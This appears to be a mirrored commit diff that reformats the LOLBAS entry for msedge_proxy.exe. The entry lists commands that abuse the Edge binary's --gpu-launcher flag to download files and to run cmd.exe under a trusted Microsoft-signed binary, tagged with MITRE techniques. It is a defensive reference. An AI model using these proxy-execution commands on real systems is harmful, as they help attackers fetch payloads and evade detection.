mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-28 15:58:24 +01:00
Update msedge_proxy.yml
This commit is contained in:
parent
f8743a4109
commit
d5f153b84b
@ -1,26 +1,26 @@
|
|||||||
---
|
---
|
||||||
Name: msedge_proxy.exe
|
Name: msedge_proxy.exe
|
||||||
Description: Microsoft edge Browser
|
Description: Microsoft Edge Browser
|
||||||
Author: 'Mert Daş'
|
Author: 'Mert Daş'
|
||||||
Created: 2023-08-18
|
Created: 2023-08-18
|
||||||
Commands:
|
Commands:
|
||||||
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" http://example.com/test.zip
|
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe http://example.com/test.zip"
|
||||||
Description: msedge_proxy will download malicious file.
|
Description: msedge_proxy will download malicious file.
|
||||||
Usecase: Download file from the internet
|
Usecase: Download file from the internet
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="c:\\Windows\\System32\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\Desktop\test.json &&"
|
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c curl ipinfo.io/json --output %USERPROFILE%\\\\Desktop\\\\test.json &&\""
|
||||||
Description: Edge will silently download the file.
|
Description: Edge will silently download the file.
|
||||||
Usecase: Download file from the internet
|
Usecase: Download file from the internet
|
||||||
Category: Download
|
Category: Download
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1105
|
MitreID: T1105
|
||||||
OperatingSystem: Windows 10, Windows 11
|
OperatingSystem: Windows 10, Windows 11
|
||||||
- Command: "C:\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe" --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\system32\\cmd.exe /c ping google.com &&"
|
- Command: "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge_proxy.exe --disable-gpu-sandbox --gpu-launcher=\"C:\\\\Windows\\\\System32\\\\cmd.exe /c ping google.com &&\""
|
||||||
Description: msedge_proxy.exe will execute file in the background
|
Description: msedge_proxy.exe will execute file in the background
|
||||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
Usecase: Executes a process under a trusted Microsoft-signed binary
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1218
|
MitreID: T1218
|
||||||
|
Loading…
Reference in New Issue
Block a user